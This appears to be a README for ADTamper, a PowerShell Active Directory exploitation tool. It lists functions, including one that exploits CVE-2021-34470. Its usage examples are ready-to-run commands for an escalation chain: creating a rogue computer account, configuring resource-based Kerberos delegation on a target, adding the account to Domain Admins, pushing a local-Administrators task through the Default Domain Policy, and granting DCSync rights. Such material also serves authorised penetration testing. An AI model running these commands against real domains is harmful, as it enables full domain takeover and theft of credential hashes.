ADTamper is a PowerShell tool for Active Directory exploitation.
New-UserAccount - creates a new user account in a given Active Directory domain
New-ComputerAccount - creates a new computer account in a given Active Directory domain
New-RogueAccount - creates a new Active Directory account (user or computer) by exploiting CVE-2021-34470
New-DomainDnsRecord - creates a new DNS record in a given Active Directory domain
New-GPImmediateTask - creates an immediate scheduled task to push out through a given Active Directory group policy
Add-GPGroupMember - adds a domain account to a local group through a given Active Directory group policy
Add-GPUserRightsAssignment - adds user rights to a domain account through a given Active Directory group policy
Set-UserPassword - modifies the password of a given Active Directory account
Set-UserNTHash - modifies the password hash of a given Active Directory account
Set-KerberosDelegation - adds or removes a Kerberos delegation for a given Active Directory account
Set-LdapObject - modifies properties for a given Active Directory object (e.g. members of a group)
Set-LdapObjectOwner - modifies the owner for a given Active Directory object
Set-LdapObjectAcl - adds or removes an ACL for a given Active Directory object
Remove-LdapObject - removes a given Active Directory object
- Create a domain computer account:
New-ComputerAccount -SamAccountName 'testcomputer$' -Password 'P@ssw0rd'
- Reset the password of a domain account:
Set-UserPassword -SamAccountName 'testcomputer$' -NewPassword 'Str0ngP@ssw0rd' -Reset
- Add a DNS record to an Active Directory-Integrated DNS (ADIDNS) zone:
New-DomainDnsRecord -RecordType A -Name 'testcomputer' -ZoneName 'adatum.corp' -Data ''
- Configure a Kerberos Resource-Based Delegation for a domain account that is going to be allowed to delegate authentication on an targeted system:
Set-KerberosDelegation -SamAccountName 'testcomputer$' -RBCD -TargetDN 'CN=WS10,CN=Computers,DC=ADATUM,DC=CORP' -Operation Add
- Add a domain account to an existing domain group:
Set-LdapObject -DistinguishedName 'CN=Domain Admins,CN=Users,DC=ADATUM,DC=CORP' -Properties @{member='CN=testcomputer,CN=Computers,DC=ADATUM,DC=CORP'} -Operation Add
- Add a domain account to the Administrators local group of domain computers:
$id = (Get-LdapObject -Filter "(&(objectCategory=groupPolicyContainer)(DisplayName=Default Domain Policy))" -Properties cn).cn
New-GPImmediateTask -PolicyId $id -Command 'cmd.exe' -CommandArguments '/c net localgroup Administrators testcomputer$ /add' -Scope Computer
- Assign 'DCSync' extended rights to a domain account:
$sid = (New-Object Security.Principal.SecurityIdentifier (Get-LdapObject -Filter '(sAMAccountName=testcomputer$)').objectSid,0).Value
Set-LdapObjectAcl -DistinguishedName "DC=ADATUM,DC=CORP" -PrincipalSID $sid -Rights DCSync -Operation Add
- Delete a domain account:
Remove-LdapObject -DistinguishedName 'CN=testcomputer,CN=Computers,DC=ADATUM,DC=CORP'